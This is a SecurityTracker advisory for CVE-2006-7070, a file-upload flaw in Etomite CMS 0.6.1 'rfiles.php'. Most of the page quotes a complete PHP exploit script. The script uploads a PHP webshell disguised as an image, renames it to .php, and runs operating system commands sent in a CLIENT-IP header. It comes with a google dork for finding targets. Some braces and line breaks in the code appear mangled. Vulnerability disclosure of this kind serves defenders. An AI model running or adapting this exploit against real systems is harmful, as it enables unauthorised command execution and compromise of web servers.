Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Etomite 'rfiles.php' Lets Remote Users Upload and Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1016593
|
|
SecurityTracker URL: http://securitytracker.com/id?1016593
|
|
CVE Reference: CVE-2006-7070
(Links to External Site)
|
Updated: Jun 13 2008
|
Original Entry Date: Jul 27 2006
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 0.6.1 and prior versions
|
Description: A vulnerability was reported in Etomite. A remote user can upload and execute arbitrary code on the target system.
The 'rfiles.php' script does not properly validate user-supplied files. A remote user can user the image file upload feature to
upload a file containing arbitrary PHP code. Then, the user can rename the file with a '.php' file extension and cause the web
server to execute the code. The PHP code, including operating system commands, will run with the privileges of the target web service.
rgod
reported this vulnerability.
The original advisory is available at:
http://retrogod.altervista.org/etomite_061_cmd.html
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.etomite.org/ (Links to External Site)
|
Cause: Access control error, Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: rgod@autistici.org
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 25 Jul 2006 11:12:23 +0000
From: rgod@autistici.org
Subject: Etomite CMS <= 0.6.1 'rfiles.php' remote command execution
|
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Etomite CMS <= 0.6.1 'rfiles.php' remote command execution\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "google dork: \"Content managed by the Etomite Content Management System\"\r\n\r\
n";
/*
works regardless of php.ini settings
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to etomite\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /etomite/ \r\n";
echo "php ".$argv[0]." localhost / -P1.1.1.1:80\r\n";
die;
/*
software site: http://www.etomite.org/
explaination:
if you can call directly rfiles.php script you can upload an image file, then
you can rename it with .php extension, so you launch commands...
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
function make_seed()
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
$port=str_replace("-p","",$argv[$i]);
if ($temp=="-P")
$proxy=str_replace("-P","",$argv[$i]);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; d
ie;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
srand(make_seed());
$anumber = rand(1,999);
$valid = array('gif', 'jpg', 'jpeg', 'png');
for ($i=0; $i<count($valid); $i++)
$data='-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="lang"
en
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="param"
upload
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="flist"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="cimg"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="ilibs"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="randomParam"
&w=150&h=150&zc=1
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="popClassName"
default
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="popTitle"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="in_srcnew"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="in_dirnew"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="nfile[]"; filename="suntzu'.$anumber.'.php.'.$va
lid[$i].'"
Content-Type:
<?php set_time_limit(0);echo "my_delim";passthru($_SERVER["HTTP_CLIENT_IP"]);e
cho "my_delim";?>
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="chkThumbSize[0]"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="selRotate"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_title"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_alt"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_class"
default
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_align"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_border"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_vspace"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_hspace"
-----------------------------7d6341a4e0c5a
Content-Disposition: form-data; name="pr_captionClass"
default
-----------------------------7d6341a4e0c5a--
';
$packet ="POST ".$p."manager/media/ibrowser/scripts/rfiles.php HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-f
lash, */*\r\n";
$packet.="Referer: http://".$host.$path."manager/media/ibrowser/ibrowser.php\r\n"
;
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6341a4e0c5a\r
\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$data='-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="lang"
en
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="param"
rename|suntzu'.$anumber.'.php.'.$valid[$i].'|suntzu'.$anumber.'.php
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="flist"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="cimg"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="ilibs"
'.$path.'manager/media/ibrowser/temp/
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="randomParam"
&w=150&h=150&zc=1
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="popClassName"
default
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="popTitle"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="in_srcnew"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="in_dirnew"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="nfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="chkThumbSize[0]"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="selRotate"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_title"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_alt"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_class"
default
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_align"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_border"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_vspace"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_hspace"
-----------------------------7d62f31919f0218
Content-Disposition: form-data; name="pr_captionClass"
default
-----------------------------7d62f31919f0218--
';
$packet ="POST ".$p."manager/media/ibrowser/scripts/rfiles.php HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-f
lash, */*\r\n";
$packet.="Referer: http://".$host.$path."manager/media/ibrowser/ibrowser.php\r\n"
;
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62f31919f0218
\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$packet ="GET ".$p."manager/media/ibrowser/temp/suntzu".$anumber.".php HTTP/
1.0\r\n";
$packet.="CLIENT-IP: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"my_delim"))
$temp=explode("my_delim",$html);
echo "exploit succeeded...\r\n";
die($temp[1]);
//if you are here...
echo "exploit failed...";
?>
original url: http://retrogod.altervista.org/etomite_061_cmd.html
also sql injection:
http://retrogod.altervista.org/etomite_061_sql.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
